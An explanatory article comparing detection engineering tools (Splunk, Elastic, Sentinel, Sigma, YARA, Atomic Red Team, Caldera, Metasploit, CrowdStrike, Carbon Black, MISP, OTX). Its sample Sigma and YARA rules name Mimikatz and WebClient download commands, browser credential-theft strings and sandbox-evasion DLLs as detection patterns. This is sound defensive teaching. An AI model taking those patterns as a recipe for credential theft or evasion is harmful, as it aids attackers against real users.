Detection engineering focuses on creating, testing, and optimizing detection rules to identify threats and suspicious activities in an organization’s network or systems.
Here are some key tools used in detection engineering.
1. SIEM (Security Information and Event Management)
SIEM (Security Information and Event Management) tools are software platforms that collect, analyze, and correlate security data from various sources across an organization’s network, such as logs, events, and alerts. They provide real-time monitoring, threat detection, incident response capabilities, and help organizations meet compliance requirements by offering insights into potential security risks and vulnerabilities. SIEM tools integrate with other security systems to centralize security management and streamline threat hunting and investigation processes.
Comparison of Splunk, Elastic Security (formerly ELK Stack) & Azure Sentinel
| Feature | Splunk | Elastic Security (ELK) | Azure Sentinel |
| Data Ingestion | Ingests structured, semi-structured, and unstructured data from logs, metrics, events, and alerts.* | Ingests data from logs, metrics, cloud sources, and network devices. | Ingests data from Azure services, on-premise systems, and third-party apps, especially within the Microsoft ecosystem (Azure AD, Office 365, etc.) |
| Query Language | Search Processing Language is highly versatile and supports advanced search operations such as filtering, correlation, aggregation, and pattern recognition. | Querying is performed using Kibana Query Language (KQL) and Lucene, making it flexible for both simple and advanced searches. | Kusto Query Language is powerful yet easy to learn, offering filtering, sorting, and correlation capabilities across datasets. |
| Dashboards & Visualizations | Provides a variety of visualization options such as graphs, charts, tables, and maps for real-time data insights. | Kibana provides a user-friendly interface for querying and visualizing data stored | Users can customize dashboards to show visual trends in security data such as login attempts, network traffic, and endpoint activity. |
| SIEM Capabilities | SIEM | SIEM & EDR | SIEM & SOAR |
| Machine Learning | Offers built-in machine learning capabilities for anomaly detection, predictive analytics, and risk scoring. Provides a Machine Learning Toolkit for advanced data modeling and pattern detection. | Provides machine learning features for anomaly detection, including outlier detection, forecasting, and behavior analytics. | It automates detection of advanced persistent threats (APTs) and correlates events using AI models |
| Alerts & Automated Response | Real-time alerting based on predefined thresholds or anomaly detection. Automated actions in response to alerts, such as invoking scripts or workflows. | Offers built-in detection rules, including behavioral analytics and SIEM capabilities, allowing for real-time threat detection. Provides automated alerting and response capabilities based on predefined security rules. | Provides automated threat detection, investigation, and response***** using built-in rules and AI-powered analytics. Leverages Microsoft’s extensive threat intelligence network, enabling enhanced threat detection and faster response times. |
| Integration & Extensibility | MITRE ATT&CK for threat intelligence. REST API and SDK for Python, Java, JavaScript Third-party integrations with pre-built applications include various services like AWS, Microsoft Azure, Salesforce, and more.** | Elastic is open-source and has a large ecosystem of plugins and integrations. **** | Integrates natively with other Microsoft security products like Defender, Azure AD, Office 365, and Intune, making it powerful for organizations already within the Azure ecosystem. Supports third-party data ingestion through APIs and connectors, including security products like Palo Alto, Cisco, and AWS. |
| Scalability | Horizontally and vertically scalable***, supporting both on-premises and cloud environments. Splunk Cloud offers a fully managed version of the platform. | Designed for distributed and horizontally scalable deployments. Offers Elastic Cloud, a fully managed cloud service. | It is cloud-native and runs on Azure infrastructure. The platform automatically scales according to the organization’s needs. |
* Structured data means well-organized, easily parsed data (e.g., databases, predefined logs) that fits into SIEM’s correlation and search functionalities. Semi-structured data is somewhat organized data (e.g., syslog, JSON, XML) that is flexible but still has identifiable patterns for extraction. Unstructured data is completely disorganized data (e.g., free-text logs, PCAP files) that requires advanced processing techniques for analysis.
** https://splunkbase.splunk.com/
*** Supporting both horizontal scaling (adding more servers) and vertical scaling (adding resources to existing servers) to handle massive amounts of data.
**** https://www.elastic.co/integrations/data-integrations
***** Offers SOAR capabilities, allowing for automated incident response workflows using Playbooks, which are built on Azure Logic Apps. Enables automatic responses to security incidents, such as isolating compromised endpoints or blocking malicious IPs.
2. Detection Rule Management Tools
Detection rule management tools are software platforms used to create, modify, and manage rules that identify suspicious activities or threats within a network or system. These tools allow security teams to define specific conditions (rules) for detecting potential security incidents, automate responses, and fine-tune detection accuracy. They are crucial in SIEMs, IDS/IPS, and EDR systems to ensure timely and accurate identification of threats, reducing false positives and improving incident response efficiency.
Sigma & YARA
| Features | Sigma | YARA |
| Purpose | Designed for SIEM systems. Translates generic log-based detection rules into specific SIEM queries. | Focused on malware identification. Primarily used to identify and classify malware based on patterns in files, binaries, or memory. |
| Use Case | Mainly used in threat hunting, security operations centers (SOC), and for detecting patterns of behavior in logs across various infrastructures. | Primarily used in malware analysis and digital forensics to classify malware based on file signatures. |
| Integration | SIEM tools | VirusTotal, Automatic Malware Analysis Tools and EDR systems |
| Flexibility | Highly flexible due to its platform-agnostic nature, supporting multiple SIEM backends with minimal rule changes. | More rigid but extremely effective in its niche for detecting specific malware patterns. It has its specific format. |
Syntax Comparison
You will see that both of the detection rule management tools work on the same principle. There are suspicious strings and those strings are searched depending on the condition given in the rule.
title: Suspicious PowerShell Command
logsource:
product: windows
service: powershell
detection:
keywords:
- 'Invoke-Mimikatz'
- 'New-Object Net.WebClient'
condition: keywords
This Sigma rule checks if there is a suspicious Powershell command running. The suspicious commands in the rule are “Invoke-Mimikatz” and “New-Object Net.WebClient” which provides network access through a Powershell session.
rule agenttesla_detector {
meta:
author = "psy_maestro"
date = "18/Feb/2024"
description = "Detects AgentTesla"
SHA256 = "e9c028ecb36a6fb2e3a9f2ce8e58fa444649dd3c47039765cca1967dcc99ef3b"
strings:
$anti_analysis1 = "cmdvrt32.dll" wide
$anti_analysis2 = "snxhk.dll" wide
$anti_analysis3 = "SxIn.dll" wide
$anti_analysis4 = "Sf2.dll" wide
$anti_analysis5 = "SbieDll.dll" wide
$stealer1 = "Login Data" wide
$stealer2 = "logins" wide
$stealer3 = "\\User Data" wide
$stealer4 = "autofill" wide
condition:
uint16(0) == 0x5A4D and //looks for MZ at 0x00
uint32(uint32(0x3C)) == 0x00004550 and // PE at 0x3C
all of them
}
Source: https://medium.com/@psy_maestro/agenttesla-malware-analysis-report-12400875db82
This rule is created for detecting AgentTesla malware. The rule is written based on a single AgentTesla sample and its success rate is checked from https://www.unpac.me/ and https://www.hybrid-analysis.com/#homepage-search-yara
3. Attack Simulation and Emulation
Attack simulation and emulation tools are security platforms that mimic real-world cyberattacks to assess an organization’s defenses. These tools simulate various attack techniques, tactics, and procedures (TTPs) used by adversaries to test the effectiveness of security controls, identify vulnerabilities, and improve incident response. Unlike traditional testing methods, such as penetration testing, attack simulation tools are designed to continuously evaluate security postures in a controlled, repeatable manner, helping organizations improve resilience against real-world threats.
Atomic Red Team, Caldera & Metasploit
| Features | Atomic Red Team | Caldera | Metasploit |
| Purpose | Focuses on testing defensive capabilities by emulating adversarial techniques from the MITRE ATT&CK framework. | An automated adversary emulation platform that allows users to simulate full attack chains using the MITRE ATT&CK framework. | Primarily a penetration testing tool that focuses on discovering vulnerabilities, exploiting them, and gaining unauthorized access to systems. |
| Attack Simulation & Exploits | Designed for tactic and technique emulation, not full exploitation. | Simulates adversary behaviors across an entire attack chain, from initial access to persistence and exfiltration. | Exploit-driven and focused on finding and using vulnerabilities in systems to gain access. |
| Integration | Directly tied to the MITRE ATT&CK framework, with each test mapped to a specific technique in the framework. | Also based on the MITRE ATT&CK framework, but with an emphasis on full attack emulation, including adversary goals and chaining techniques together to simulate realistic attack scenarios. | Not inherently mapped to the MITRE ATT&CK framework, though many exploits can be mapped to TTPs within MITRE ATT&CK. |
| Usage Complexity | Modular and simple to use with atomic tests that can be easily run via command-line scripts. | Moderate complexity, especially as it involves full adversary simulations. | More complex due to the wide range of tools, exploits, and payloads available. Requires a deeper understanding of penetration testing and exploits to use effectively. |
| Community and Support | Open-source. Backed by Red Canary with new implementations of MITRE ATT&CK techniques. | Open-source. Developed and maintained by MITRE, it has a solid user base focused on adversary emulation. | One of the largest and most active communities in the security space, with constant updates to its vulnerability and exploit database. |
4. EDR (Endpoint Detection and Response)
Endpoint Detection and Response (EDR) tools are security solutions that monitor and analyze endpoint activities in real-time to detect, investigate, and respond to cyber threats. EDR tools provide visibility into endpoints, such as laptops and servers, to identify suspicious behaviors, malware, and advanced persistent threats (APTs). They offer capabilities like threat hunting, incident response, and automated remediation, helping organizations quickly contain and mitigate attacks before they spread across the network.
CrowdStrike Falcon & Carbon Black
| Features | Crowdstrike Falcon | Carbon Black |
| Architecture | Cloud-native architecture, which means the platform requires no on-premises infrastructure. | Carbon Black offers a hybrid architecture, where some components can be deployed on-premises, but it also has a cloud-based option for scalability. |
| Methodology | Falcon uses a combination of machine learning, behavioral analysis, and threat intelligence to detect threats. Falcon’s Threat Graph analyzes data in real time across all devices in the CrowdStrike network, allowing for cross-customer detections. | Carbon Black leverages streaming prevention and behavioral EDR for threat detection. While it also uses AI and machine learning, Carbon Black places a strong emphasis on manual threat hunting and behavioral analytics. |
| Threat Intelligence | Falcon has its own threat intelligence service called Falcon X, which provides threat reports, automated malware analysis, and detailed attribution information. | Carbon Black’s threat intelligence feeds are primarily sourced from VMware’s Threat Intelligence Cloud, which aggregates information from multiple sources. |
| Threat Hunting | Falcon OverWatch, a managed threat hunting service, leverages CrowdStrike’s global threat telemetry to proactively hunt for threats in customer environments. | Offers strong capabilities for manual threat hunting, allowing security analysts to dig into extensive telemetry to uncover stealthy attacks. |
| Performance | Known for its low system resource usage, Falcon’s lightweight agent consumes minimal CPU, memory, and network bandwidth since it works on cloud. | The Carbon Black agent can be more resource-intensive, as it continuously collects detailed telemetry from the endpoints. |
| Integration | Offers a wide range of integrations through Falcon’s API, including SIEM systems, SOAR platforms, and other security tools. | Supports integration with SIEMs, SOAR platforms, and other tools, but its strongest advantage lies in its native VMware support. |
5. Threat Intelligence Platforms
Threat Intelligence Platforms are security tools designed to aggregate, analyze, and manage threat intelligence data from various sources. They help organizations identify and understand emerging threats, track indicators of compromise (IoCs), and enhance detection and response capabilities. Threat Intelligence Platforms enable the sharing of threat intelligence across teams or with external partners, improving overall security posture by integrating this intelligence into existing security tools like SIEMs and EDR systems.
MISP (Malware Information Sharing Platform) & Open Threat Exchange (OTX)
| Features | MISP | OTX |
| Purpose | MISP is an open-source threat intelligence platform designed for collaborative sharing of threat intelligence (malware indicators, threat actors, attack techniques). | Its primary goal is to offer a community-driven threat intelligence platform where users can share threat data (Indicators of Compromise – IoCs) and consume intelligence shared by other users. |
| Architecture | MISP is an on-premise or self-hosted solution, giving organizations full control over their threat intelligence data. | OTX is cloud-based and hosted by AT&T, with no self-hosting option. |
| Data Sharing & Collaboration | MISP allows for highly controlled and structured sharing of threat intelligence. Users can define sharing groups, determine access permissions, and segment information based on trust groups. MISP facilitates the sharing of threat data through communities, sectors, and CERTs. | OTX has a centralized sharing model where threat intelligence is shared with the broader OTX community. Sharing is less granular than in MISP. Once shared, data is available to the entire community, without specific control over who accesses the information. Collaboration is more open, but with less fine-tuned privacy control. |
| Formats & Standards | STIX, TAXII, OpenIOC, and IODEF | OTX supports standardized IoCs in its own format, with basic indicators such as IP addresses, domain names, URLs, and file hashes. |
| Ease of Use | MISP requires more technical expertise to set up and operate compared to OTX. It is a powerful platform with many configuration options, making it suitable for organizations with dedicated security teams. | OTX is designed to be simple and easy to use, even for users without advanced technical skills. The platform has a clean and intuitive UI that allows users to quickly browse, create, and consume threat intelligence. |
| Community | MISP has a strong focus on trusted communities, where organizations collaborate and exchange threat intelligence in closed groups or sectors (e.g., ISACs, national CERTs). | OTX is an open community with contributions from a wide range of users, from individual researchers to large organizations. OTX fosters open collaboration, but this may come at the cost of trust, as shared data is available to the entire OTX user base, and there is less control over quality and data reliability. |
| Integration | MISP offers strong integration capabilities, supporting APIs, scripts, and plugins for integration with SIEMs, firewalls, IDS/IPS, and other security tools. | OTX provides an API that allows users to integrate IoCs from OTX into their SIEMs or security tools. |